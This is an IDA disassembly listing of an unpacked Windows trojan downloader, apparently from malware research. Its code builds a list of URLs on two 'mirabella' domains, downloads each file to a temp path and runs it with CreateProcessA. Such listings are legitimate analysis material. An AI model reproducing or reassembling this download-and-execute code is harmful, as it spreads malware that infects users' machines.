;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 3A08B6BB67543ED67BB3B21C41E91852
; File Name : u:\work\3a08b6bb67543ed67bb3b21c41e91852_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 0000C000 ( 49152.)
; Section size in file : 0000C000 ( 49152.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 401000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401000 proc near ; CODE XREF: start-F85B�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 1Ch
push ebx
push esi
push edi
call sub_40137A
mov eax, ds:dword_4108C4
mov ebx, [eax]
mov esi, offset dword_4108C0
mov [esp+28h+var_10], esi
loc_401021: ; CODE XREF: sub_401000+DC�j
test esi, esi
mov edi, ds:dword_4108C4
jz short loc_401033
cmp esi, offset dword_4108C0
jz short loc_401038
loc_401033: ; CODE XREF: sub_401000+29�j
call sub_4021B5
loc_401038: ; CODE XREF: sub_401000+31�j
cmp ebx, edi
jz loc_4010E1
test esi, esi
jnz short loc_401049
call sub_4021B5
loc_401049: ; CODE XREF: sub_401000+42�j
cmp ebx, [esi+4]
jnz short loc_401053
call sub_4021B5
loc_401053: ; CODE XREF: sub_401000+4C�j
lea edi, [ebx+8]
mov eax, [edi+4]
mov eax, [eax]
mov esi, edi
mov [esp+28h+var_14], eax
mov [esp+28h+var_18], esi
loc_401065: ; CODE XREF: sub_401000+C6�j
mov eax, [esp+28h+var_10]
cmp ebx, [eax+4]
jnz short loc_401073
call sub_4021B5
loc_401073: ; CODE XREF: sub_401000+6C�j
test esi, esi
mov eax, [edi+4]
mov [esp+28h+var_4], eax
jz short loc_401082
cmp esi, edi
jz short loc_401087
loc_401082: ; CODE XREF: sub_401000+7C�j
call sub_4021B5
loc_401087: ; CODE XREF: sub_401000+80�j
mov eax, [esp+28h+var_4]
cmp [esp+28h+var_14], eax
jz short loc_4010C8
test esi, esi
jnz short loc_40109A
call sub_4021B5
loc_40109A: ; CODE XREF: sub_401000+93�j
mov eax, [esp+28h+var_14]
cmp eax, [esi+4]
jnz short loc_4010A8
call sub_4021B5
loc_4010A8: ; CODE XREF: sub_401000+A1�j
mov eax, [esp+28h+var_14]
push dword ptr [eax+8]
call sub_4010EC
test al, al
pop ecx
jnz short loc_4010C8
lea esi, [esp+28h+var_18]
call sub_401247
mov esi, [esp+28h+var_18]
jmp short loc_401065
; ---------------------------------------------------------------------------
loc_4010C8: ; CODE XREF: sub_401000+8F�j
; sub_401000+B7�j
mov eax, [esp+28h+var_10]
cmp ebx, [eax+4]
jnz short loc_4010D6
call sub_4021B5
loc_4010D6: ; CODE XREF: sub_401000+CF�j
mov ebx, [ebx]
mov esi, [esp+28h+var_10]
jmp loc_401021
; ---------------------------------------------------------------------------
loc_4010E1: ; CODE XREF: sub_401000+3A�j
pop edi
pop esi
xor eax, eax
pop ebx
mov esp, ebp
pop ebp
retn 10h
sub_401000 endp
; =============== S U B R O U T I N E =======================================
sub_4010EC proc near ; CODE XREF: sub_401000+AF�p
push 280h
mov eax, offset loc_40B05D
call sub_4045C7
mov eax, [ebp+8]
mov edi, 104h
xor ebx, ebx
push edi
mov [ebp-22Ch], eax
lea eax, [ebp-11Bh]
push ebx
push eax
mov [ebp-11Ch], bl
call sub_4021D0
add esp, 0Ch
lea eax, [ebp-11Ch]
push eax
lea esi, [edi+1]
push esi
call dword_40C00C ; GetTempPathA
cmp eax, esi
ja short loc_40113B
cmp eax, ebx
jnz short loc_40114E
loc_40113B: ; CODE XREF: sub_4010EC+49�j
lea eax, [ebp-11Ch]
push offset byte_40DA4F
push eax
call sub_402260
pop ecx
pop ecx
loc_40114E: ; CODE XREF: sub_4010EC+4D�j
push edi
lea eax, [ebp-223h]
push ebx
push eax
mov [ebp-224h], bl
call sub_4021D0
add esp, 0Ch
lea eax, [ebp-224h]
push eax
push ebx
push offset dword_40DA50
lea eax, [ebp-11Ch]
push eax
call dword_40C004 ; GetTempFileNameA
inc ds:dword_4108BC
mov [ebp-225h], bl
mov [ebp-230h], ebx
mov ecx, [ebp-22Ch]
lea edx, [ebp-224h]
mov [ebp-4], ebx
call sub_401C1F
test al, al
jz short loc_40121D
lea eax, [ebp-224h]
push eax
call sub_401E85
test al, al
pop ecx
jz short loc_40121D
push 44h
pop esi
push esi
lea eax, [ebp-28Ch]
push ebx
push eax
call sub_4021D0
add esp, 0Ch
push 10h
lea eax, [ebp-240h]
push ebx
push eax
mov [ebp-28Ch], esi
call sub_4021D0
add esp, 0Ch
lea eax, [ebp-240h]
push eax
lea eax, [ebp-28Ch]
push eax
lea eax, [ebp-11Ch]
push eax
push ebx
push 8000000h
push ebx
push ebx
push ebx
lea eax, [ebp-224h]
push eax
push ebx
call dword_40C008 ; CreateProcessA
test eax, eax
jz short loc_40121D
mov byte ptr [ebp-225h], 1
loc_40121D: ; CODE XREF: sub_4010EC+BB�j
; sub_4010EC+CC�j ...
dec ds:dword_4108BC
jnz short loc_40123B
mov eax, ds:dword_4108B8
cmp eax, ebx
jz short loc_40123B
push eax
call dword_40C120 ; InternetCloseHandle
mov ds:dword_4108B8, ebx
loc_40123B: ; CODE XREF: sub_4010EC+137�j
; sub_4010EC+140�j
mov al, [ebp-225h]
call sub_404611
retn
sub_4010EC endp
; =============== S U B R O U T I N E =======================================
sub_401247 proc near ; CODE XREF: sub_401000+BD�p
; sub_401ADC+5B�p ...
cmp dword ptr [esi], 0
jnz short loc_401251
call sub_4021B5
loc_401251: ; CODE XREF: sub_401247+3�j
mov eax, [esi]
mov ecx, [esi+4]
cmp ecx, [eax+4]
jnz short loc_401260
call sub_4021B5
loc_401260: ; CODE XREF: sub_401247+12�j
mov eax, [esi+4]
mov eax, [eax]
mov [esi+4], eax
mov eax, esi
retn
sub_401247 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40126B proc near ; CODE XREF: sub_40146B+79�p
; sub_4014FD+25�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4024EE
mov eax, [ebp+arg_0]
add esp, 10h
pop ebp
retn
sub_40126B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401287 proc near ; CODE XREF: sub_401691+50�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40272B
mov eax, [ebp+arg_0]
add esp, 10h
pop ebp
retn
sub_401287 endp
; =============== S U B R O U T I N E =======================================
sub_4012A3 proc near ; DATA XREF: UPX1:0040E304�o
mov dword ptr [ecx], offset off_40C174
jmp sub_4024AF
sub_4012A3 endp
; ---------------------------------------------------------------------------
loc_4012AE: ; DATA XREF: UPX0:off_40C174�o
push esi
mov esi, ecx
mov dword ptr [esi], offset off_40C174
call sub_4024AF
test byte ptr [esp+8], 1
jz short loc_4012CA
push esi
call sub_4023DB
pop ecx
loc_4012CA: ; CODE XREF: UPX0:004012C1�j
mov eax, esi
pop esi
retn 4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_4012D1 proc near ; CODE XREF: sub_401548+42�p
; sub_401606+43�p ...
push 4
mov eax, offset loc_40B0A8
call sub_40455E
mov esi, ecx
mov [ebp-10h], esi
call sub_4023E0
and dword ptr [ebp-4], 0
push dword ptr [ebp+8]
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_40C180
call sub_40143B
mov eax, esi
call sub_4045FD
retn 4
sub_4012D1 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_401306 proc near ; CODE XREF: UPX0:00401334�p
; UPX0:00401353�j ...
push esi
mov esi, ecx
push 0
push 1
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_40C180
call sub_4014FD
mov ecx, esi
pop esi
jmp sub_4024AF
sub_401306 endp
; =============== S U B R O U T I N E =======================================
sub_401323 proc near ; DATA XREF: UPX0:0040C184�o
; UPX0:0040C190�o ...
cmp dword ptr [ecx+24h], 10h
jb short loc_40132D
mov eax, [ecx+10h]
retn
; ---------------------------------------------------------------------------
loc_40132D: ; CODE XREF: sub_401323+4�j
lea eax, [ecx+10h]
retn
sub_401323 endp
; ---------------------------------------------------------------------------
loc_401331: ; DATA XREF: UPX0:off_40C180�o
push esi
mov esi, ecx
call sub_401306
test byte ptr [esp+8], 1
jz short loc_401347
push esi
call sub_4023DB
pop ecx
loc_401347: ; CODE XREF: UPX0:0040133E�j
mov eax, esi
pop esi
retn 4
; ---------------------------------------------------------------------------
loc_40134D: ; DATA XREF: UPX1:0040E2CC�o
mov dword ptr [ecx], offset off_40C18C
jmp sub_401306
; ---------------------------------------------------------------------------
loc_401358: ; DATA XREF: UPX0:off_40C18C�o
push esi
mov esi, ecx
mov dword ptr [esi], offset off_40C18C
call sub_401306
test byte ptr [esp+8], 1
jz short loc_401374
push esi
call sub_4023DB
pop ecx
loc_401374: ; CODE XREF: UPX0:0040136B�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_40137A proc near ; CODE XREF: sub_401000+C�p
push 14h
mov eax, offset sub_40B144
call sub_40455E
call sub_4015B8
and dword ptr [ebp-14h], 0
mov [ebp-18h], eax
and dword ptr [ebp-4], 0
push dword ptr [ebp-18h]
lea eax, [ebp-1Ch]
push eax
lea eax, [ebp-10h]
mov ebx, offset aHttpThemirabel ; "http://themirabellaguide.com/pr/pic/lyn"...
push eax
lea edi, [ebp-1Ch]
mov [ebp-10h], ebx
call sub_401548
mov eax, [ebp-18h]
push eax
mov ecx, edi
push ecx
lea eax, [ebp-10h]
mov esi, offset aHttpYourmirabe ; "http://yourmirabelladirect.com/pr/pic/l"...
push eax
mov [ebp-10h], esi
call sub_401548
mov eax, [ebp-18h]
push eax
mov ecx, edi
push ecx
lea eax, [ebp-10h]
push eax
mov [ebp-10h], ebx
call sub_401548
mov eax, [ebp-18h]
push eax
mov ecx, edi
push ecx
lea eax, [ebp-10h]
push eax
mov [ebp-10h], esi
call sub_401548
mov eax, [ebp-18h]
push eax
mov ecx, edi
push ecx
lea eax, [ebp-10h]
push eax
mov [ebp-10h], ebx
call sub_401548
mov eax, [ebp-18h]
push eax
mov ecx, edi
push ecx
lea eax, [ebp-10h]
push eax
mov [ebp-10h], esi
call sub_401548
mov eax, ds:dword_4108C4
push eax
mov ecx, offset dword_4108C0
push ecx
mov eax, edi
push eax
call sub_401606
mov esi, edi
call sub_4015D0
call sub_4045FD
retn
sub_40137A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_401436: ; CODE XREF: UPX0:0040B13F�j
jmp sub_4015D0
; =============== S U B R O U T I N E =======================================
sub_40143B proc near ; CODE XREF: sub_4012D1+26�p
; sub_401826+2B�p
arg_0 = dword ptr 4
push esi
mov esi, ecx
push 0
mov dword ptr [esi+18h], 0Fh
call sub_401700
push 0FFFFFFFFh
push 0
push [esp+0Ch+arg_0]
mov ecx, esi
call sub_40146B
mov eax, esi
pop esi
retn 4
sub_40143B endp
; ---------------------------------------------------------------------------
loc_401461: ; CODE XREF: UPX0:0040B017�j
; UPX0:0040B11C�j
push 0
push 1
call sub_4014FD
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40146B proc near ; CODE XREF: sub_40143B+1B�p
; sub_401981+2B�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
cmp [edi+14h], eax
mov ebx, ecx
jnb short loc_401483
call sub_402034
loc_401483: ; CODE XREF: sub_40146B+11�j
mov esi, [edi+14h]
mov eax, [ebp+arg_4]
sub esi, eax
cmp [ebp+arg_8], esi
jnb short loc_401493
mov esi, [ebp+arg_8]
loc_401493: ; CODE XREF: sub_40146B+23�j
cmp ebx, edi
mov ecx, ebx
jnz short loc_4014B1
push 0FFFFFFFFh
add esi, eax
push esi
call sub_401691
push [ebp+arg_4]
mov ecx, ebx
push 0
call sub_401691
jmp short loc_4014F4
; ---------------------------------------------------------------------------
loc_4014B1: ; CODE XREF: sub_40146B+2C�j
push 0
push esi
call sub_40171C
test al, al
jz short loc_4014F4
cmp dword ptr [edi+18h], 10h
jb short loc_4014C8
mov edi, [edi+4]
jmp short loc_4014CB
; ---------------------------------------------------------------------------
loc_4014C8: ; CODE XREF: sub_40146B+56�j
add edi, 4
loc_4014CB: ; CODE XREF: sub_40146B+5B�j
mov ecx, [ebx+18h]
cmp ecx, 10h
jb short loc_4014D8
mov eax, [ebx+4]
jmp short loc_4014DB
; ---------------------------------------------------------------------------
loc_4014D8: ; CODE XREF: sub_40146B+66�j
lea eax, [ebx+4]
loc_4014DB: ; CODE XREF: sub_40146B+6B�j
mov edx, [ebp+arg_4]
push esi
add edi, edx
push edi
push ecx
push eax
call sub_40126B
add esp, 10h
push esi
mov ecx, ebx
call sub_401700
loc_4014F4: ; CODE XREF: sub_40146B+44�j
; sub_40146B+50�j
pop edi
pop esi
mov eax, ebx
pop ebx
pop ebp
retn 0Ch
sub_40146B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4014FD proc near ; CODE XREF: sub_401306+10�p
; UPX0:00401465�p ...
arg_0 = byte ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0
push esi
mov esi, ecx
jz short loc_401532
cmp dword ptr [esi+18h], 10h
jb short loc_401532
cmp [esp+4+arg_4], 0
lea eax, [esi+4]
push edi
mov edi, [eax]
jbe short loc_40152A
push [esp+8+arg_4]
push edi
push 10h
push eax
call sub_40126B
add esp, 10h
loc_40152A: ; CODE XREF: sub_4014FD+1B�j
push edi
call sub_4023DB
pop ecx
pop edi
loc_401532: ; CODE XREF: sub_4014FD+8�j
; sub_4014FD+E�j
push [esp+4+arg_4]
mov ecx, esi
mov dword ptr [esi+18h], 0Fh
call sub_401700
pop esi
retn 8
sub_4014FD endp
; =============== S U B R O U T I N E =======================================
sub_401548 proc near ; CODE XREF: sub_40137A+32�p
; sub_40137A+4A�p ...
push 48h
mov eax, offset loc_40B121
call sub_40455E
push dword ptr [ebp+8]
mov esi, [ebp+10h]
push dword ptr [esi+4]
push esi
call sub_40177A
mov ecx, [edi+8]
mov edx, 3FFFFFFFh
sub edx, ecx
cmp edx, 1
jnb short loc_4015A4
push offset aListTTooLong ; "list<T> too long"
lea ecx, [ebp-2Ch]
call sub_401860
and dword ptr [ebp-4], 0
lea eax, [ebp-2Ch]
push eax
lea ecx, [ebp-54h]
call sub_4012D1
push offset dword_40E2C8
lea eax, [ebp-54h]
push eax
mov dword ptr [ebp-54h], offset off_40C18C
call sub_40414D
loc_4015A4: ; CODE XREF: sub_401548+28�j
inc ecx
mov [edi+8], ecx
mov [esi+4], eax
mov ecx, [eax+4]
mov [ecx], eax
call sub_4045FD
retn 0Ch
sub_401548 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4015B8 proc near ; CODE XREF: sub_40137A+C�p
; sub_401A89+11�p
push 0Ch
call sub_402371
test eax, eax
pop ecx
jz short loc_4015C6
mov [eax], eax
loc_4015C6: ; CODE XREF: sub_4015B8+A�j
lea ecx, [eax+4]
test ecx, ecx
jz short locret_4015CF
mov [ecx], eax
locret_4015CF: ; CODE XREF: sub_4015B8+13�j
retn
sub_4015B8 endp
; =============== S U B R O U T I N E =======================================
sub_4015D0 proc near ; CODE XREF: sub_40137A+B1�p
; UPX0:loc_401436�j ...
mov eax, [esi+4]
mov ecx, [eax]
mov [eax], eax
mov eax, [esi+4]
mov [eax+4], eax
and dword ptr [esi+8], 0
cmp ecx, [esi+4]
jz short loc_4015F8
push edi
loc_4015E7: ; CODE XREF: sub_4015D0+25�j
mov edi, [ecx]
push ecx
call sub_4023DB
cmp edi, [esi+4]
pop ecx
mov ecx, edi
jnz short loc_4015E7
pop edi
loc_4015F8: ; CODE XREF: sub_4015D0+14�j
push dword ptr [esi+4]
call sub_4023DB
and dword ptr [esi+4], 0
pop ecx
retn
sub_4015D0 endp
; =============== S U B R O U T I N E =======================================
sub_401606 proc near ; CODE XREF: sub_40137A+AA�p
push 48h
mov eax, offset loc_40B121
call sub_40455E
push dword ptr [ebp+8]
mov esi, [ebp+10h]
push dword ptr [esi+4]
push esi
call sub_4017AB
mov ecx, 15555555h
sub ecx, ds:dword_4108C8
cmp ecx, 1
jnb short loc_401663
push offset aListTTooLong ; "list<T> too long"
lea ecx, [ebp-2Ch]
call sub_401860
and dword ptr [ebp-4], 0
lea eax, [ebp-2Ch]
push eax
lea ecx, [ebp-54h]
call sub_4012D1
push offset dword_40E2C8
lea eax, [ebp-54h]
push eax
mov dword ptr [ebp-54h], offset off_40C18C
call sub_40414D
loc_401663: ; CODE XREF: sub_401606+29�j
inc ds:dword_4108C8
mov [esi+4], eax
mov ecx, [eax+4]
mov [ecx], eax
call sub_4045FD
retn 0Ch
sub_401606 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_401679 proc near ; CODE XREF: sub_40B15F�p
push 14h
call sub_402371
test eax, eax
pop ecx
jz short loc_401687
mov [eax], eax
loc_401687: ; CODE XREF: sub_401679+A�j
lea ecx, [eax+4]
test ecx, ecx
jz short locret_401690
mov [ecx], eax
locret_401690: ; CODE XREF: sub_401679+13�j
retn
sub_401679 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401691 proc near ; CODE XREF: sub_40146B+33�p
; sub_40146B+3F�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
mov esi, ecx
cmp [esi+14h], edi
jnb short loc_4016A5
call sub_402034
loc_4016A5: ; CODE XREF: sub_401691+D�j
mov eax, [esi+14h]
sub eax, edi
cmp eax, [ebp+arg_4]
jnb short loc_4016B2
mov [ebp+arg_4], eax
loc_4016B2: ; CODE XREF: sub_401691+1C�j
cmp [ebp+arg_4], 0
jbe short loc_4016F8
mov ecx, [esi+18h]
cmp ecx, 10h
push ebx
lea edx, [esi+4]
jb short loc_4016C8
mov ebx, [edx]
jmp short loc_4016CA
; ---------------------------------------------------------------------------
loc_4016C8: ; CODE XREF: sub_401691+31�j
mov ebx, edx
loc_4016CA: ; CODE XREF: sub_401691+35�j
cmp ecx, 10h
jb short loc_4016D1
mov edx, [edx]
loc_4016D1: ; CODE XREF: sub_401691+3C�j
sub eax, [ebp+arg_4]
add ebx, edi
add ebx, [ebp+arg_4]
push eax
push ebx
sub ecx, edi
push ecx
add edx, edi
push edx
call sub_401287
mov eax, [esi+14h]
sub eax, [ebp+arg_4]
add esp, 10h
push eax
mov ecx, esi
call sub_401700
pop ebx
loc_4016F8: ; CODE XREF: sub_401691+25�j
pop edi
mov eax, esi
pop esi
pop ebp
retn 8
sub_401691 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_401700 proc near ; CODE XREF: sub_40143B+C�p
; sub_40146B+84�p ...
arg_0 = dword ptr 4
cmp dword ptr [ecx+18h], 10h
mov eax, [esp+arg_0]
mov [ecx+14h], eax
jb short loc_401712
mov ecx, [ecx+4]
jmp short loc_401715
; ---------------------------------------------------------------------------
loc_401712: ; CODE XREF: sub_401700+B�j
add ecx, 4
loc_401715: ; CODE XREF: sub_401700+10�j
mov byte ptr [ecx+eax], 0
retn 4
sub_401700 endp
; =============== S U B R O U T I N E =======================================
sub_40171C proc near ; CODE XREF: sub_40146B+49�p
; sub_401981+39�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push esi
push edi
mov edi, [esp+8+arg_0]
cmp edi, 0FFFFFFFEh
mov esi, ecx
jbe short loc_40172E
call sub_401FF5
loc_40172E: ; CODE XREF: sub_40171C+B�j
cmp [esi+18h], edi
jnb short loc_401740
push dword ptr [esi+14h]
mov ecx, esi
push edi
call sub_401882
jmp short loc_40176D
; ---------------------------------------------------------------------------
loc_401740: ; CODE XREF: sub_40171C+15�j
cmp [esp+8+arg_4], 0
jz short loc_401761
cmp edi, 10h
jnb short loc_401761
mov eax, [esi+14h]
cmp edi, eax
jnb short loc_401755
mov eax, edi
loc_401755: ; CODE XREF: sub_40171C+35�j
push eax
push 1
mov ecx, esi
call sub_4014FD
jmp short loc_40176D
; ---------------------------------------------------------------------------
loc_401761: ; CODE XREF: sub_40171C+29�j
; sub_40171C+2E�j
test edi, edi
jnz short loc_40176D
push edi
mov ecx, esi
call sub_401700
loc_40176D: ; CODE XREF: sub_40171C+22�j
; sub_40171C+43�j ...
xor eax, eax
cmp eax, edi
sbb eax, eax
pop edi
neg eax
pop esi
retn 8
sub_40171C endp
; =============== S U B R O U T I N E =======================================
sub_40177A proc near ; CODE XREF: sub_401548+16�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 0Ch
call sub_402371
test eax, eax
pop ecx
jz short loc_40178C
mov ecx, [esp+arg_0]
mov [eax], ecx
loc_40178C: ; CODE XREF: sub_40177A+A�j
lea ecx, [eax+4]
test ecx, ecx
jz short loc_401799
mov edx, [esp+arg_4]
mov [ecx], edx
loc_401799: ; CODE XREF: sub_40177A+17�j
lea ecx, [eax+8]
test ecx, ecx
jz short locret_4017A8
mov edx, [esp+arg_8]
mov edx, [edx]
mov [ecx], edx
locret_4017A8: ; CODE XREF: sub_40177A+24�j
retn 0Ch
sub_40177A endp
; =============== S U B R O U T I N E =======================================
sub_4017AB proc near ; CODE XREF: sub_401606+16�p
push 8
mov eax, offset loc_40B0FE
call sub_404591
push 14h
call sub_402371
and dword ptr [ebp-4], 0
mov esi, eax
test esi, esi
pop ecx
mov [ebp-14h], esi
jz short loc_4017D1
mov eax, [ebp+8]
mov [esi], eax
loc_4017D1: ; CODE XREF: sub_4017AB+1F�j
lea eax, [esi+4]
test eax, eax
jz short loc_4017DD
mov ecx, [ebp+0Ch]
mov [eax], ecx
loc_4017DD: ; CODE XREF: sub_4017AB+2B�j
lea eax, [esi+8]
test eax, eax
mov byte ptr [ebp-4], 1
jz short loc_4017F1
mov ecx, [ebp+10h]
push eax
call sub_401A89
loc_4017F1: ; CODE XREF: sub_4017AB+3B�j
mov eax, esi
call sub_4045FD
retn 0Ch
sub_4017AB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4017FB proc near ; DATA XREF: UPX1:0040E4C8�o
arg_0 = dword ptr 4
push dword ptr [ebp-14h]
call sub_4023DB
pop ecx
push 0
push 0
call sub_40414D
int 3 ; Trap to Debugger
push esi
push [esp+4+arg_0]
mov esi, ecx
call sub_401826
mov dword ptr [esi], offset off_40C18C
mov eax, esi
pop esi
retn 4
sub_4017FB endp
; =============== S U B R O U T I N E =======================================
sub_401826 proc near ; CODE XREF: sub_4017FB+1A�p
; sub_402034+46�p
push 4
mov eax, offset loc_40B0A8
call sub_40455E
mov esi, ecx
mov [ebp-10h], esi
mov edi, [ebp+8]
push edi
call sub_402457
and dword ptr [ebp-4], 0
add edi, 0Ch
push edi
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_40C180
call sub_40143B
mov eax, esi
call sub_4045FD
retn 4
sub_401826 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_401860 proc near ; CODE XREF: sub_401548+32�p
; sub_401606+33�p ...
arg_0 = dword ptr 4
push esi
mov esi, ecx
push 0
mov dword ptr [esi+18h], 0Fh
call sub_401700
push [esp+4+arg_0]
mov ecx, esi
call sub_401964
mov eax, esi
pop esi
retn 4
sub_401860 endp
; =============== S U B R O U T I N E =======================================
sub_401882 proc near ; CODE XREF: sub_40171C+1D�p
push 0Ch
mov eax, offset loc_40B085
call sub_404591
mov edi, ecx
mov [ebp-18h], edi
mov esi, [ebp+8]
or esi, 0Fh
cmp esi, 0FFFFFFFEh
jbe short loc_4018A3
mov esi, [ebp+8]
jmp short loc_4018C8
; ---------------------------------------------------------------------------
loc_4018A3: ; CODE XREF: sub_401882+1A�j
xor edx, edx
push 3
mov eax, esi
pop ebx
div ebx
mov ecx, [edi+18h]
mov [ebp-14h], ecx
shr dword ptr [ebp-14h], 1
mov edx, [ebp-14h]
cmp eax, edx
jnb short loc_4018C8
push 0FFFFFFFEh
pop eax
sub eax, edx
cmp ecx, eax
ja short loc_4018C8
lea esi, [edx+ecx]
loc_4018C8: ; CODE XREF: sub_401882+1F�j
; sub_401882+38�j ...
and dword ptr [ebp-4], 0
lea eax, [esi+1]
push 0
push eax
call sub_401A27
pop ecx
pop ecx
mov ebx, eax
jmp short loc_401907
; ---------------------------------------------------------------------------
loc_4018DD: ; DATA XREF: UPX1:0040E378�o
mov eax, [ebp+8]
mov [ebp-10h], esp
mov [ebp+8], eax
inc eax
push 0
push eax
mov byte ptr [ebp-4], 2
call sub_401A27
pop ecx
mov [ebp-14h], eax
pop ecx
mov eax, offset loc_4018FE
retn
; ---------------------------------------------------------------------------
loc_4018FE: ; DATA XREF: sub_401882+76�o
mov edi, [ebp-18h]
mov esi, [ebp+8]
mov ebx, [ebp-14h]
loc_401907: ; CODE XREF: sub_401882+59�j
cmp dword ptr [ebp+0Ch], 0
jbe short loc_40192C
cmp dword ptr [edi+18h], 10h
jb short loc_401918
mov eax, [edi+4]
jmp short loc_40191B
; ---------------------------------------------------------------------------
loc_401918: ; CODE XREF: sub_401882+8F�j
lea eax, [edi+4]
loc_40191B: ; CODE XREF: sub_401882+94�j
push dword ptr [ebp+0Ch]
push eax
lea eax, [esi+1]
push eax
push ebx
call sub_40126B
add esp, 10h
loc_40192C: ; CODE XREF: sub_401882+89�j
push 0
push 1
mov ecx, edi
call sub_4014FD
push dword ptr [ebp+0Ch]
mov ecx, edi
mov [edi+4], ebx
mov [edi+18h], esi
call sub_401700
call sub_4045FD
retn 8
sub_401882 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40194F proc near ; DATA XREF: UPX1:0040E368�o
mov ecx, [ebp-18h]
xor esi, esi
push esi
push 1
call sub_4014FD
push esi
push esi
call sub_40414D
int 3 ; Trap to Debugger
sub_40194F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_401964 proc near ; CODE XREF: sub_401860+17�p
arg_0 = dword ptr 4
push esi
push [esp+4+arg_0]
mov esi, ecx
call sub_4026A0
pop ecx
push eax
push [esp+8+arg_0]
mov ecx, esi
call sub_401981
pop esi
retn 4
sub_401964 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401981 proc near ; CODE XREF: sub_401964+14�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
push edi
mov esi, ecx
call sub_4019F3
test al, al
jz short loc_4019B3
cmp dword ptr [esi+18h], 10h
jb short loc_4019A0
mov eax, [esi+4]
jmp short loc_4019A3
; ---------------------------------------------------------------------------
loc_4019A0: ; CODE XREF: sub_401981+18�j
lea eax, [esi+4]
loc_4019A3: ; CODE XREF: sub_401981+1D�j
push [ebp+arg_4]
sub edi, eax
push edi
push esi
mov ecx, esi
call sub_40146B
jmp short loc_4019ED
; ---------------------------------------------------------------------------
loc_4019B3: ; CODE XREF: sub_401981+12�j
push 0
push [ebp+arg_4]
mov ecx, esi
call sub_40171C
test al, al
jz short loc_4019EB
mov ecx, [esi+18h]
cmp ecx, 10h
jb short loc_4019D0
mov eax, [esi+4]
jmp short loc_4019D3
; ---------------------------------------------------------------------------
loc_4019D0: ; CODE XREF: sub_401981+48�j
lea eax, [esi+4]
loc_4019D3: ; CODE XREF: sub_401981+4D�j
push [ebp+arg_4]
push edi
push ecx
push eax
call sub_40126B
add esp, 10h
push [ebp+arg_4]
mov ecx, esi
call sub_401700
loc_4019EB: ; CODE XREF: sub_401981+40�j
mov eax, esi
loc_4019ED: ; CODE XREF: sub_401981+30�j
pop edi
pop esi
pop ebp
retn 8
sub_401981 endp
; =============== S U B R O U T I N E =======================================
sub_4019F3 proc near ; CODE XREF: sub_401981+B�p
arg_0 = dword ptr 4
push esi
mov esi, [ecx+18h]
cmp esi, 10h
lea eax, [ecx+4]
jb short loc_401A03
mov edx, [eax]
jmp short loc_401A05
; ---------------------------------------------------------------------------
loc_401A03: ; CODE XREF: sub_4019F3+A�j
mov edx, eax
loc_401A05: ; CODE XREF: sub_4019F3+E�j
cmp [esp+4+arg_0], edx
jb short loc_401A21
cmp esi, 10h
jb short loc_401A12
